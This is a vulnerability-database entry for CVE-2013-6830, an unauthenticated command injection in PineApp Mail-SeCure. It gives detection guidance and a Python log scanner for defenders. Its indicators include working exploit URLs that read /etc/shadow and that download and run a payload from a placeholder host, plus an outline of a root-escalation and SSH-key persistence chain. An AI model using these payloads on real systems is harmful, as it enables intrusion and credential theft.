CVE-2013-6830
Published: 2013-11-20

Priority: P2 63 · Severity: high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Exploit: available · EPSS: 8.93% (94.6th percentile)
admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms allows remote attackers to execute arbitrary commands via shell metacharacters in the nsserver parameter during an nslookup operation.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pineapp | mail-secure_5099sk | <= - | — |
Detection & IOCs (extracted from sources)

- URL: `https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow`
- URL: `https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile`
- Command: `cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile`
- Detect unauthenticated GET requests to /admin/confnetworking.html containing shell metacharacters (semicolons) in the `nsserver` query parameter, indicative of command injection attempts.
- Monitor HTTP/HTTPS traffic on port 7443 for requests to /admin/confnetworking.html with query parameters `cmd=nslookup` and `nsserver` values containing `;`, `%3B`, or other shell metacharacters.
- Alert on creation or modification of /tmp/rc.firewall, which is abused for privilege escalation to root via a weak sudoers configuration on PineApp Mail-SeCure appliances.
- Detect outbound wget or curl requests originating from the PineApp appliance process context (qmailq user), which may indicate a payload download following the initial command injection.
- Monitor SSH connections on non-standard port 7022 to the appliance, especially from external sources, as the exploit chain culminates in root SSH access via an injected authorized_keys entry.
- Alert on writes to /root/.ssh/authorized_keys on the appliance, as the exploit injects an attacker-controlled SSH public key to establish persistent root access.
- Note: the exploit requires no authentication; the vulnerable endpoint /admin/confnetworking.html is accessible without credentials, making network-level access control the primary mitigation.
- Note: privilege escalation to root depends on a weak sudoers configuration specific to the appliance; not all deployments may be equally vulnerable to the full root escalation chain.
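As an added detection example (not taken from the advisory, the vendor, or any indexed rule), the following Python scans web-server access-log lines for the pattern the bullets above describe: a request to /admin/confnetworking.html with `cmd=nslookup` whose percent-decoded `nsserver` value contains shell metacharacters. The log format, client addresses and timestamps are assumptions; the sample lines are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache/nginx "combined"-style, assumed).
# The path and parameter names come from the advisory; hosts and times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Nov/2013:10:01:02 +0000] "GET /admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=ns1.example.net HTTP/1.1" 200 512
10.0.0.9 - - [20/Nov/2013:10:01:07 +0000] "GET /admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow HTTP/1.1" 200 2048
10.0.0.9 - - [20/Nov/2013:10:01:09 +0000] "GET /admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es%3Bid HTTP/1.1" 200 300
10.0.0.7 - - [20/Nov/2013:10:02:00 +0000] "GET /admin/index.html HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULN_PATH = "/admin/confnetworking.html"
# Characters that should never appear in a hostname handed to nslookup.
SHELL_META = set(";|&`$(){}<>\n")


def query_params(query: str) -> Dict[str, List[str]]:
    """Split a query string on '&' only; ';' is deliberately NOT a separator,
    since that is exactly the character we want to see inside the value."""
    params: Dict[str, List[str]] = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def suspicious_nsserver(target: str) -> Optional[str]:
    """Return the decoded nsserver value if this request target matches the
    injection pattern (vulnerable path, cmd=nslookup, metacharacter in nsserver)."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    qs = query_params(parts.query)
    if qs.get("cmd", [""])[0] != "nslookup":
        return None
    for raw in qs.get("nsserver", []):
        value = unquote(raw)  # second decode catches double-encoded %253B
        if any(ch in SHELL_META for ch in value):
            return value
    return None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded nsserver) for every flagged request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            value = suspicious_nsserver(m.group("target"))
            if value is not None:
                hits.append((line.split(" ", 1)[0], value))
    return hits
```

Run `scan_log(SAMPLE_LOG)` to see the two injection attempts flagged while the benign lookup and the unrelated page are ignored.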
No detection rules found.
No writeups or analysis indexed.